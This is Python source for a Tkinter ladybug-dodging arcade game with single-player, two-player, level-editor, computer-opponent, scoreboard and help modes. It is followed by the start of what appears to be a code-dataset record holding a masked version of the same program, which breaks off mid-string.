data.coconuts.append(Coconuts(xPosition4,0)) if data.time %5 ==0: xPosition3 = random.randint(0, data.Player1Min-data.buffer) data.coconuts.append(Coconuts(xPosition3,0)) if data.time % int(24/data.level) ==0: side = random.choice(data.sides) if side == "l": data.coconuts.append(Coconuts(data.Player1Min,0)) elif side =="r": data.coconuts.append(Coconuts(data.Player1Max,0)) powerUpCoconutShot(data) def powerUpCoconutShot(data): #adds powerUps #magic #s toallow for powerups to be added at different times if data.time % 60 == 0 and data.time%120 !=0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position,0)) if data.time%50 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position,0)) if data.time %100==0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position,750)) def playerKeyPressed(event,data): if data.level<data.levelMax and event.keysym == "r": init(data) if (event.keysym == "Left") and data.cx>=data.Player1Min+(data.lane/2): data.cx -=(data.lane)/2 elif(event.keysym == "Right") and data.cx<=data.Player1Max: data.cx +=(data.lane)/2 if data.level >= data.levelMax: #enter name for scoreboard if len(event.keysym) ==1: if len(data.name) <15: data.name += event.keysym if event.keysym=="BackSpace": data.name = data.name[0:-1] if event.keysym == "Return": data.scoreList += ((data.score, data.name)) #saves file writeFile("score.txt", data.savedScores+str(data.score)+","+data.name+"\n") data.mode ="scoreboard" def playerMousePressed(event, data): checkHome(event, data) def playerTimerFired(data): #actually pauses, and moves drops/player if data.hit== False and data.level<data.levelMax: data.cy-=data.speed if data.time%5 ==0: data.score +=data.level if data.cy < 15: #basically made it to the top data.level +=1 data.cy = data.Player1Max + 10 data.speed +=2 if data.cy>40: #so drops you can't see don't hit you data.time +=1 if data.pauseDrops !=True: coconutShot(data) for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: # only want drops to move if not paused if data.pauseDrops == False: coconut.onTimerFired(data) if data.beInvincible == False:hit(data) if data.start != None: if abs(data.start-data.cy) >= 120: #to limit time for powerups to be active data.pauseDrops, data.beInvincible = False, False def playerRedrawAll(canvas, data): # magic #s mainly for screen placement canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_line(0,20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width/6,50, text ="Level: %d" %data.level, font = "Arial 18 bold", fill = "yellow") canvas.create_text(data.width/6,80, text ="Score: %d" %data.score, font = "Arial 18 bold", fill = "yellow") canvas.create_text(2*data.width/3,660, text ="""The greater the level, the more points get added to your score!""", font = "Arial 15 bold", fill = "yellow") if data.hit== True: canvas.create_rectangle(0,0,data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.deadScreen) canvas.create_text(data.width/2,data.height/4, text = "You Lose! Better Luck Next Time!", font = "Helvetica 23 bold", fill = "yellow") canvas.create_text(data.width/2,280, text ="Score: %d" %data.score, font = "Arial 13 bold", fill = "yellow") if data.level >= 8: madeIt(canvas, data) drawHome(canvas, data) def madeIt(canvas, data):# magic #s mainly for screen placement canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,70, text = "You Made it!", font = "Arial 23 bold", fill = "yellow") canvas.create_text(data.width/2,100, text ="Score: %d" %data.score, font = "Arial 15 bold", fill = "yellow") canvas.create_text(data.width/2,375, text ="Congrats! Enter your Name!", font = "Arial 15 bold", fill = "yellow") canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450, fill = "white") canvas.create_text(data.width/2, 425, text = data.name) #################################### # 2Player mode #################################### def drop2Player(data): #adds drops when not paused #magic #s are position of where drops are starting if data.winner ==None and data.pauseDrops == False: if data.time%15==0: xPosition1 = random.randint(0,385) if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25: #so random drops don't interfere with the lane ones if data.pause1Drop != True: data.coconuts1.append(Coconuts(xPosition1,0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(xPosition1 +410,0)) if data.time % 12 ==0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.coconuts1.append(Coconuts(140,0)) if data.pause2Drop != True: data.coconuts2.append(Coconuts(540,0)) elif side =="r": if data.pause1Drop !=True:data.coconuts1.append(Coconuts(344,0)) if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0)) powerupDrop2Player(data) def powerupDrop2Player(data): #adds powerups on both screens (in the same position) if data.time % 45 == 0 and data.time%90 !=0: #randomize placement side = random.choice(data.sides) if side == "l": if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0)) if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0)) elif side =="r": if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0)) if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0)) if data.time%60 == 0: side = random.choice(data.sides) if side == "l": if data.pause1Drop!=True:data.invincible.append(Invincible(140,0)) if data.pause2Drop!=True:data.invincible.append(Invincible(540,0)) elif side =="r": if data.pause1Drop!=True:data.invincible.append(Invincible(344,0)) if data.pause2Drop!=True:data.invincible.append(Invincible(755,0)) if data.time %90==0: side = random.choice(data.sides) if side == "l": data.scaryBug.append(ScaryBug(140,750)) data.scaryBug.append(ScaryBug(540,750)) elif side =="r": data.scaryBug.append(ScaryBug(344,750)) data.scaryBug.append(ScaryBug(755,750)) def twoPlayerKeyPressed(event,data): # controllers for both bugs if event.keysym == "r": init(data) if data.winner==None: if (event.keysym == "a") and data.onLeft1==False: data.onLeft1 = True data.player1X = 150 if(event.keysym == "d") and data.onLeft1== True: data.onLeft1 = False data.player1X = 330 if (event.keysym == "Left") and data.onLeft2==False: data.onLeft2 = True data.player2X = 550 if(event.keysym == "Right") and data.onLeft2 == True: data.onLeft2 = False data.player2X = 750 def twoPlayerMousePressed(event, data): checkHome(event, data) def twoPlayerTimerFired(data): if data.winner == None: data.player1Y-=data.speed #<15 signifies that lady bug reached the top if data.player1Y < 15 and data.player2Y >15: data.winner= "player1" if data.player1Y>40: data.time +=1 drop2Player(data) data.player2Y-=data.speed if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2" if data.player2Y>40: data.time +=1 drop2Player(data) if data.player1Y < 15 and data.player2Y <15: data.winner = "tie" for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible:powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug:bug.onTimerFired(data) hitScaryBug(data) powerupTimerFired(data) def powerupTimerFired(data): for coconut in data.coconuts1: if data.pause1Drop == False: coconut.onTimerFired(data) hit2Player(data) for coconut in data.coconuts2: if data.pause2Drop == False: coconut.onTimerFired(data) if data.start1 != None: # to make powerups only active for set amount of time if abs(data.start1-data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2-data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def twoPlayerRedrawAll(canvas, data): #magic #s for placement on screen canvas.create_image(data.width/4, data.height/2, image=data.halfBackground) canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground) canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10) canvas.create_line(0,20, data.width, 20) for coconut in data.coconuts1: coconut.draw(canvas) for coconut in data.coconuts2: coconut.draw(canvas) drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) canvas.create_text(50,40, text = "Player 1",font = "Arial 15 bold", fill = "yellow") canvas.create_text(450,40, text = "Player 2",font = "Arial 15 bold", fill = "yellow") winner(canvas, data) drawHome(canvas, data) def winner(canvas, data): if data.winner== "player1": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it! Player 1", font = "Arial 23 bold", fill = "yellow") elif data.winner== "player2": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it! Player 2", font = "Arial 23 bold", fill = "yellow") elif data.winner== "tie": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!", font = "Arial 23 bold", fill = "yellow") #################################### # editor mode #################################### def editorKeyPressed(event,data): if event.keysym == "r": init(data) def editorMousePressed(event, data): #check for click on button for your speed checkHome(event, data) if data.easyY-data.r<= event.y <= data.easyY +data.r: if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r: data.yourSpeed = "slow" data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.yourSpeed = "medium" data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r: data.yourSpeed = "fast" data.fast = data.click data.slow, data.medium = data.notClick, data.notClick checkMiddle(event, data) checkLast(event, data) def checkMiddle(event, data): #check for click on button for rain speed if data.medX-data.r<= event.y <= data.medX + data.r: if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r: data.rainSpeed = "drizzle" data.drizzle = data.click data.rain, data.thunderstorm = data.notClick, data.notClick if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.rainSpeed = "rain" data.rain = data.click data.drizzle, data.thunderstorm = data.notClick, data.notClick if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r: data.rainSpeed = "thunderstorm" data.thunderstorm = data.click data.drizzle, data.rain = data.notClick, data.notClick def checkLast(event, data): #check for click on button for powerups if data.last-data.r<=event.y<= data.last+data.r: if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r: data.powerUpsEditor = True data.yes, data.no = data.click, data.notClick if data.last-2*data.r<= event.x<=data.last+2*data.r: data.powerUpsEditor = False data.no, data.yes = data.click, data.notClick if data.enter == data.click: if data.enterX-data.r<=event.y<=data.enterX+data.r: if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.mode="levelCreated" def drawButtons(canvas, data): #makes each button data.font, data.fill = "Helvetica 13 bold", "yellow" canvas.create_text(data.medX,data.YST, text= "Your Speed:", font = data.font,fill =data.fill) canvas.create_image(data.easyX,data.easyY, image = data.slow) canvas.create_text(data.easyX,data.easyY, text="Slow", font = data.font) canvas.create_image(data.medX,data.easyY, image = data.medium) canvas.create_text(data.medX,data.easyY, text="Medium", font = data.font) canvas.create_image(data.hardX,data.easyY, image = data.fast) canvas.create_text(data.hardX,data.easyY, text="Fast",font = data.font) canvas.create_image(data.easyX,data.medX, image = data.drizzle) canvas.create_text(data.medX,data.RST, text= "Rain Speed:", font = data.font,fill =data.fill) canvas.create_text(data.easyX,data.medX, text="Drizzle",font = data.font) canvas.create_image(data.medX,data.medX, image = data.rain) canvas.create_text(data.medX,data.medX, text="Rain",font = data.font) canvas.create_image(data.hardX,data.medX, image = data.thunderstorm) canvas.create_text(data.hardX,data.medX, text="Heavy",font = data.font) canvas.create_text(data.medX,data.PUT, text= "PowerUps?", font = data.font,fill =data.fill) canvas.create_image(data.easyY,data.last, image = data.yes) canvas.create_text(data.easyY,data.last, text="Yes",font = data.font) canvas.create_image(data.last,data.last, image = data.no) canvas.create_text(data.last,data.last, text="No",font = data.font) changeEnter(canvas, data) def changeEnter(canvas, data): #makes it so the enter button respond to click if data.powerUpsEditor != None and data.yourSpeed != None and \ data.rainSpeed != None: data.enter = data.click canvas.create_image(data.medX,data.enterX, image = data.enter) canvas.create_text(data.medX,data.enterX, text="Enter",font = data.font) def editorTimerFired(data): data.editorTime += 1 if data.editorTime %2 ==0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): #background drops xPosition = random.randint(0,data.width) data.editorDrops.append(Coconuts(xPosition,0)) def editorRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_image(data.width/2, data.height/2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width/2, data.S_P -10, text = "Edit Your Level!", font="Arial 23 bold", fill = "yellow") drawButtons(canvas, data) drawHome(canvas, data) #################################### # levelCreated mode #################################### def setEverything(data): #customizing game if data.yourSpeed == "slow": data.speed = 6 elif data.yourSpeed == "medium": data.speed = 10 elif data.yourSpeed == "fast": data.speed = 14 if data.rainSpeed == "thunderstorm": data.rSpeed = 7 elif data.rainSpeed == "rain": data.rSpeed = 10 elif data.rainSpeed == "drizzle": data.rSpeed = 13 def levelCoconutShot(data): #adding drops if data.levelEditorLives >0: if data.time%int(0.35*data.rSpeed) == 0: xPosition1 = random.randint(0,data.Player1Min-data.buffer) xPosition2 = random.randint(770, 870) xPosition3 = random.randint(220,770) data.coconuts.append(Coconuts(xPosition3,0)) data.coconuts.append(Coconuts(xPosition1,0)) data.coconuts.append(Coconuts(xPosition2,0)) if data.time % int(0.55*data.rSpeed) ==0: xPosition3 = random.randint(0, 220) xPosition5 = random.randint(220,770) data.coconuts.append(Coconuts(xPosition3,0)) data.coconuts.append(Coconuts(xPosition5,0)) if data.time % int(data.rSpeed) ==0: side = random.choice(data.sides) if side == "l": data.coconuts.append(Coconuts(3*data.width/8-20,0)) elif side =="r": data.coconuts.append(Coconuts(7*data.width/8+40,0)) xPosition4= random.randint(220,770) data.coconuts.append(Coconuts(xPosition4,0)) levelPowerUp(data) def levelPowerUp(data): # adding power-ups only if clicked yes if data.powerUpsEditor == True: if data.time % 20 == 0 and data.time%40 !=0: Position = random.choice(data.spotList) data.powerUps.append(PowerUps(Position,0)) if data.time%30 == 0: Position = random.choice(data.spotList) data.invincible.append(Invincible(Position,0)) if data.time %35==0: Position = random.choice(data.spotList) data.scaryBug.append(ScaryBug(Position,750)) def levelCreatedKeyPressed(event,data): if event.keysym == "r": init(data) if data.levelEditorLives>0: if (event.keysym == "Left") and data.cx>=317: data.cx -=(data.lane/2) elif(event.keysym == "Right") and data.cx<=740: data.cx +=(data.lane/2) def levelCreatedMousePressed(event, data): checkHome(event, data) def levelCreatedTimerFired(data): setEverything(data) if data.levelEditorLives>0: data.cy-=data.speed if data.cy < 15: data.level +=1 if data.cy>40: data.time +=1 if data.pauseDrops !=True: levelCoconutShot(data) if data.powerUpsEditor == False: for coconut in data.coconuts: coconut.onTimerFired(data) hit(data) if data.powerUpsEditor == True: for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) for coconut in data.coconuts: if data.pauseDrops == False:coconut.onTimerFired(data) if data.beInvincible == False: hit(data) if data.start != None: #to make powerups only active for set amount of time if abs(data.start-data.cy) >= 120: data.pauseDrops, data.beInvincible = False, False def levelCreatedRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_line(0,20, data.width, 20) for coconut in data.coconuts: coconut.draw(canvas) if data.powerUpsEditor == True: drawPowerups(canvas, data) canvas.create_image(data.cx, data.cy, image=data.ladyBug) canvas.create_text(data.width/6,100, text ="Total Lives: %d" %data.levelEditorLives, font = "Arial 20 bold", fill = "yellow") canvas.create_text(data.width/2,660, text ="""You lose a life for hitting a drop & don't get eaten!""", font = "Arial 15 bold", fill = "yellow") if data.levelEditorLives <=0: canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.deadScreen) canvas.create_text(data.width/2,data.height/4, text = "You Lose! Better Luck Next Time!", font = "Helvetica 23 bold", fill = "yellow") if data.level > 1: winEditor(canvas, data) drawHome(canvas, data) def winEditor(canvas, data): #screen for when you win canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it!", font = "Arial 23 bold", fill = "yellow") #################################### # AI Difficulty Mode #################################### def difficultyKeyPressed(event,data): if event.keysym == "r": init(data) def drawDifficulties(canvas, data): canvas.create_text(data.medX,data.AITY, text= "Computer Difficulty:", font="Arial 23 bold", fill = "yellow") canvas.create_image(data.easyX, data.easyY, image=data.slow) canvas.create_text(data.easyX,data.easyY, text="Easy") canvas.create_image(data.medX, data.easyY, image=data.medium) canvas.create_text(data.medX,data.easyY, text="Medium") canvas.create_image(data.hardX, data.easyY, image=data.fast) canvas.create_text(data.hardX,data.easyY, text="Hard") if data.difficulty !=None: data.enter = data.click canvas.create_image(data.medX, data.enterY, image=data.enter) canvas.create_text(data.medX,data.enterY, text="Enter") def difficultyMousePressed(event, data): #sets up buttons to customize checkHome(event, data) if data.easyY-data.r<= event.y <= data.easyY +data.r: if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r: data.difficulty = data.difS data.slow = data.click data.medium, data.fast = data.notClick, data.notClick if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.difficulty = data.difM data.medium = data.click data.slow, data.fast = data.notClick, data.notClick if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r: data.difficulty = data.difH data.fast = data.click data.slow, data.medium = data.notClick, data.notClick if data.enter == data.click: if data.enterY-data.r<=event.y<=data.enterY+data.r: if data.medX-2*data.r<= event.x<=data.medX+2*data.r: data.mode="AI" def difficultyTimerFired(data): # makes normal background rain data.editorTime += 1 if data.editorTime %2 ==0: rainDrop(data) for drop in data.editorDrops: drop.onTimerFired(data) def rainDrop(data): xPosition = random.randint(0,data.width) data.editorDrops.append(Coconuts(xPosition,0)) def difficultyRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_image(data.width/2, data.height/2, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) drawDifficulties(canvas, data) drawHome(canvas, data) #################################### # AI mode #################################### def hitAI1(data, distance): for coconut in data.coconutsAI1: # so AI switches by itself if (data.player1Y-data.r - coconut.y<=distance) and \ data.switchOnProgress == False: if coconut.x>=data.player1X-data.r and \ coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True: testInt = random.randint(0,9) # to have different levels of difficulty if testInt<= data.difficulty: data.switchOnProgress= True if data.player1X == 150: data.player1X = 340 else: data.player1X = 150 data.switchOnProgress= False if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r: if coconut.x>=data.player1X-data.r and \ coconut.x<=data.player1X+data.r: data.player1Y+=50 data.coconutsAI1.remove(coconut) def AISwitchBug(data, distance): #AI to move for spider for scaryBug in data.scaryBug: if (data.player1Y-data.r - scaryBug.y<=distance) and \ data.switchOnProgress == False: if scaryBug.x>=data.player1X-data.r and \ scaryBug.x<=data.player1X+data.r: return True def hitAI2(data, distance): # check if human controlled player hits drops for coconut in data.coconutsAI2: if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r: if coconut.x>=data.player2X-data.r and \ coconut.x<=data.player2X+data.r: data.player2Y+=50 data.coconutsAI2.remove(coconut) def coconutShotAI(data): if data.winner ==None: # randomize position of drops off of tree if data.time%15==0: xPosition1 = random.randint(0,385) if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40: if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition1,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition1 +410,0)) if data.time%8 ==0: xPosition2 = random.randint(0,80) xPosition3 = random.randint(364, 385) if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(xPosition2,0)) data.coconutsAI1.append(Coconuts(xPosition3,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(xPosition2+410,0)) data.coconutsAI2.append(Coconuts(xPosition3+410,0)) addExtraCoconut(data) addPowerUpsAI(data) def addExtraCoconut(data): #adds drops to edges of trees if data.time % (18) ==0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(140,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(540,0)) elif side =="r": if data.pause1Drop != True: data.coconutsAI1.append(Coconuts(344,0)) if data.pause2Drop != True: data.coconutsAI2.append(Coconuts(755,0)) if data.time % 37 == 0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.powerUps.append(PowerUps(140,0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(550,0)) elif side =="r": if data.pause1Drop != True: data.powerUps.append(PowerUps(344,0)) if data.pause2Drop != True: data.powerUps.append(PowerUps(755,0)) def addPowerUpsAI(data): #randomly add powerups on tree if data.time%33 == 0: side = random.choice(data.sides) if side == "l": if data.pause1Drop != True: data.invincible.append(Invincible(140,0)) if data.pause2Drop != True: data.invincible.append(Invincible(550,0)) elif side =="r": if data.pause1Drop != True: data.invincible.append(Invincible(344,0)) if data.pause2Drop != True: data.invincible.append(Invincible(755,0)) if data.time %66==0: side = random.choice(data.sides) if side == "l": data.scaryBug.append(ScaryBug(140,750)) data.scaryBug.append(ScaryBug(550,750)) elif side =="r": data.scaryBug.append(ScaryBug(344,750)) data.scaryBug.append(ScaryBug(750,750)) def AIKeyPressed(event,data): if event.keysym == "r": init(data) if data.winner==None: if (event.keysym == "Left") and data.onLeft1==False: data.onLeft1 = True data.player2X = 550 elif(event.keysym == "Right") and data.onLeft1== True: data.onLeft1 = False data.player2X = 750 def AIMousePressed(event, data): checkHome(event, data) def AITimerFired(data): if data.winner == None: #want to check hit twice (before & after elements move) if data.Invincible1 == False:hitAI1(data, 31) if data.Invincible2 == True: pass elif data.Invincible2 == False:hitAI2(data, 31) for coconut in data.coconutsAI1: if data.pause1Drop == False:coconut.onTimerFired(data) for coconut in data.coconutsAI2: if data.pause2Drop == False:coconut.onTimerFired(data) # second check if data.Invincible1 == False:hitAI1(data,13) if data.Invincible2 == True:pass elif data.Invincible2 == False:hitAI2(data,13) data.player1Y-=data.speedAI #establishing winer if data.player1Y < 15 and data.player2Y >15: data.winner= "player1" if data.player1Y>40: data.time +=1 coconutShotAI(data) data.player2Y-=data.speedAI if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2" if data.player2Y>40: data.time +=1 coconutShotAI(data) if data.player1Y < 15 and data.player2Y <15: data.winner = "tie" for powerUp in data.powerUps: powerUp.onTimerFired(data) hitPause(data) powerUpAITimerFired(data) def powerUpAITimerFired(data): #moves both sides symmetrically for powerUp in data.invincible: powerUp.onTimerFired(data) hitInvincible(data) for bug in data.scaryBug: bug.onTimerFired(data) hitScaryBug(data) if data.start1 != None: if abs(data.start1-data.player1Y) >= 120: data.pause1Drop = False data.Invincible1 = False if data.start2 != None: if abs(data.start2-data.player2Y) >= 120: data.pause2Drop = False data.Invincible2 = False def AIRedrawAll(canvas, data): canvas.create_image(data.width/4, data.height/2, image=data.halfBackground) canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground) canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10) canvas.create_line(0,20, data.width, 20) for coconut in data.coconutsAI1: coconut.draw(canvas) for coconut in data.coconutsAI2: coconut.draw(canvas) canvas.create_text(50,40, text = "Computer",font = "Arial 15 bold", fill = "yellow") canvas.create_text(450,40, text = "Player 1",font = "Arial 15 bold", fill = "yellow") drawPowerups(canvas, data) canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug) canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug) AIWinner(canvas, data) drawHome(canvas, data) def AIWinner(canvas, data): if data.winner== "player1": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "The Computer Won :(", font = "Arial 23 bold", fill = "yellow") elif data.winner== "player2": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "You Made it! You Won!", font = "Arial 23 bold", fill = "yellow") elif data.winner== "tie": canvas.create_rectangle(0,0, data.width, data.height, fill = "black") canvas.create_image(data.width/2, data.height/2, image=data.winScreen) canvas.create_image(300, 320, image=data.winBug) canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!", font = "Arial 23 bold", fill = "yellow") #################################### # ScoreBoard mode #################################### def scoreboardKeyPressed(event, data): if event.keysym == "r": init(data) def scoreboardMousePressed(event, data): checkHome(event, data) def scoreboardTimerFired(data): difficultyTimerFired(data) def scoreboardRedrawAll(canvas, data): canvas.create_image(data.width/2, data.height/2, image=data.background) canvas.create_image(data.width/2, data.tbgY, image=data.tbg) for drop in data.editorDrops: drop.draw(canvas) canvas.create_text(data.width/2, data.txtTScore, text="Top Scores!", font = "Arial 30 bold", fill = "yellow") canvas.create_text(data.width/2, data.S_P, text="Score_Player", font = "Arial 20 bold", fill = "yellow") drawHome(canvas, data) #reads file data.savedScores data.savedScores=readFile("score.txt") score=data.savedScores.splitlines() scores=[] for line in score: scores.append(line.split(",")) #sorts scores to find top 5 scores = sorted(scores, key = lambda x: int(x[0])) top5 = scores[-data.numScores:] top5.reverse() for i in range(len(top5)): canvas.create_text(data.width/2, data.scoreShift+(i*50), text = top5[i], font = "Arial 18 bold", fill = "yellow") #################################### # help mode #################################### def helpKeyPressed(event, data): if event.keysym == "r": init(data) def helpMousePressed(event, data): checkHome(event, data) def helpTimerFired(data): difficultyTimerFired(data) def helpRedrawAll(canvas, data): canvas.create_image(data.width/2, data.helpY, image=data.helpScreen) for drop in data.editorDrops: drop.draw(canvas) drawHome(canvas, data) ####################################### # use the run function as-is from notes ####################################### def run(width=15000, height=25000): def redrawAllWrapper(canvas, data): canvas.delete(ALL) redrawAll(canvas, data) canvas.update() def mousePressedWrapper(event, canvas, data): mousePressed(event, data) redrawAllWrapper(canvas, data) def keyPressedWrapper(event, canvas, data): keyPressed(event, data) redrawAllWrapper(canvas, data) def timerFiredWrapper(canvas, data): timerFired(data) redrawAllWrapper(canvas, data) # pause, then call timerFired again canvas.after(data.timerDelay, timerFiredWrapper, canvas, data) # Set up data and call init class Struct(object): pass data = Struct() data.width = width data.height = height data.timerDelay = 100 # milliseconds # create the root and the canvas root = Tk() init(data) canvas = Canvas(root, width=data.width, height=data.height) canvas.pack() # set up events root.bind("<Button-1>", lambda event: mousePressedWrapper(event, canvas, data)) root.bind("<Key>", lambda event: keyPressedWrapper(event, canvas, data)) timerFiredWrapper(canvas, data) # and launch the app root.mainloop() # blocks until window is closed print("bye!") run(1000, 1000)
flexible
{ "blob_id": "c893095be88636e6cb06eb3b939d8106fbb7a8ca", "index": 470, "step-1": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\n<mask token>\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef 